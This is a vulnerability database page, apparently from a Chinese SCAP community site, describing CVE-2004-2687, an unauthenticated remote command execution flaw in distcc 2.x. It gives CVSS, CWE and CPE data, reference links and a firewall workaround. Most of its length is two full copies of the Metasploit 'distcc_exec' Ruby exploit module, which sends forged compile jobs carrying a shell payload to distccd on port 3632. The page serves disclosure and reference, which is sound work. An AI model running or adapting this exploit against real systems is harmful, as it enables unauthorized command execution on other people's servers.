CVE-2004-2687
CVSS9.3
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 00:00:00
NMCOEP    

[原文]distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.


[CNNVD]Apple Xcode Tools 配置错误漏洞(CNNVD-200412-679)

        用于XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制时,远程攻击者可以借助编辑工作执行任意命令,该漏洞被无授权检查的服务器执行。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-16 [配置]

- CPE (受影响的平台与产品)

cpe:/a:samba:samba:2.18.3Samba 2.18.3
cpe:/a:apple:xcode:1.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-679
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/13378
(UNKNOWN)  OSVDB  13378
http://www.metasploit.org/projects/Framework/exploits.html#distcc_exec
(UNKNOWN)  MISC  http://www.metasploit.org/projects/Framework/exploits.html#distcc_exec
http://lists.samba.org/archive/distcc/2004q3/002562.html
(UNKNOWN)  MLIST  [distcc] 20040826 Exploit in distcc ( got compromised ;( )
http://lists.samba.org/archive/distcc/2004q3/002550.html
(UNKNOWN)  MLIST  [distcc] 20040826 Exploit in distcc ( got compromised ;( )
http://distcc.samba.org/security.html
(UNKNOWN)  CONFIRM  http://distcc.samba.org/security.html
http://archives.neohapsis.com/archives/bugtraq/2005-03/0183.html
(UNKNOWN)  BUGTRAQ  20050310 XCode 1.5 and distcc 2.x Exploit

- 漏洞信息

Apple Xcode Tools 配置错误漏洞
高危 配置错误
2004-12-31 00:00:00 2007-09-24 00:00:00
远程  
        用于XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制时,远程攻击者可以借助编辑工作执行任意命令,该漏洞被无授权检查的服务器执行。

- 公告与补丁

        

- 漏洞信息 (16919)

DistCC Daemon Command Execution (EDBID:16919)
linux remote
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DistCC Daemon Command Execution',
			'Description'    => %q{
				This module uses a documented security weakness to execute
				arbitrary commands on any system running distccd.

			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2004-2687'],
					[ 'OSVDB', '13378' ],
					[ 'URL', 'http://distcc.samba.org/security.html'],

				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 01 2002'
			))

			register_options(
				[
					Opt::RPORT(3632)
				], self.class)
	end

	def exploit
		connect

		distcmd = dist_cmd("sh", "-c", payload.encoded);
		sock.put(distcmd)

		dtag = rand_text_alphanumeric(10)
		sock.put("DOTI0000000A#{dtag}\n")

		res = sock.get_once(24, 5)

		if !(res and res.length == 24)
			print_status("The remote distccd did not reply to our request")
			disconnect
			return
		end

		# Check STDERR
		res = sock.get_once(4, 5)
		res = sock.get_once(8, 5)
		len = [res].pack("H*").unpack("N")[0]

		return if not len
		if (len > 0)
			res = sock.get_once(len, 5)
			res.split("\n").each do |line|
				print_status("stderr: #{line}")
			end
		end

		# Check STDOUT
		res = sock.get_once(4, 5)
		res = sock.get_once(8, 5)
		len = [res].pack("H*").unpack("N")[0]

		return if not len
		if (len > 0)
			res = sock.get_once(len, 5)
			res.split("\n").each do |line|
				print_status("stdout: #{line}")
			end
		end

		handler
		disconnect
	end


	# Generate a distccd command
	def dist_cmd(*args)

		# Convince distccd that this is a compile
		args.concat(%w{# -c main.c -o main.o})

		# Set distcc 'magic fairy dust' and argument count
		res = "DIST00000001" + sprintf("ARGC%.8x", args.length)

		# Set the command arguments
		args.each do |arg|
			res << sprintf("ARGV%.8x%s", arg.length, arg)
		end

		return res
	end

end

		

- 漏洞信息 (F82331)

DistCC Daemon Command Execution (PacketStormID:F82331)
2009-10-28 00:00:00
H D Moore  metasploit.com
exploit,arbitrary
CVE-2004-2687
[点击下载]

This Metasploit module uses a documented security weakness to execute arbitrary commands on any system running distccd.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'DistCC Daemon Command Execution',
			'Description'    => %q{
				This module uses a documented security weakness to execute
				arbitrary commands on any system running distccd.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2687'],
					[ 'OSVDB', '13378' ],
					[ 'URL', 'http://distcc.samba.org/security.html'],

				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,				
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(3632)
				], self.class)			
	end

	def exploit
		connect

		distcmd = dist_cmd("sh", "-c", payload.encoded);
		sock.put(distcmd)
		
		dtag = rand_text_alphanumeric(10)
		sock.put("DOTI0000000A#{dtag}\n")
		
		res = sock.get_once(24, 5)
		
		if !(res and res.length == 24)
			print_status("The remote distccd did not reply to our request")
			disconnect
			return
		end
		
		# Check STDERR
		res = sock.get_once(4, 5)
		res = sock.get_once(8, 5)
		len = [res].pack("H*").unpack("N")[0]
		
		if (len > 0)
			res = sock.get_once(len, 5)
			res.split("\n").each do |line|
				print_status("stderr: #{line}")
			end
		end

		# Check STDOUT
		res = sock.get_once(4, 5)
		res = sock.get_once(8, 5)
		len = [res].pack("H*").unpack("N")[0]
		
		if (len > 0)
			res = sock.get_once(len, 5)
			res.split("\n").each do |line|
				print_status("stdout: #{line}")
			end
		end
				
		handler
		disconnect
	end
	
	
	# Generate a distccd command
	def dist_cmd(*args)
	
		# Convince distccd that this is a compile
		args.concat(%w{# -c main.c -o main.o})
		
		# Set distcc 'magic fairy dust' and argument count
		res = "DIST00000001" + sprintf("ARGC%.8x", args.length)
		
		# Set the command arguments
		args.each do |arg|
			res << sprintf("ARGV%.8x%s", arg.length, arg)
		end
		
		return res
	end

end

    

- 漏洞信息

13378
distcc Daemon Command Execution
Remote / Network Access Misconfiguration
Loss of Integrity Workaround
Exploit Public

- 漏洞描述

distcc contains a flaw that may allow a malicious user to execute arbitrary commands. distcc does not perform any authentication or authorization of connections, and instead relies on 3rd party access controls. It is possible that the flaw may allow arbitrary command execution resulting in a loss of integrity.

- 时间线

2002-02-01 Unknow
2002-02-01 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Use ssh or firewall rules to restrict connections to the server.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站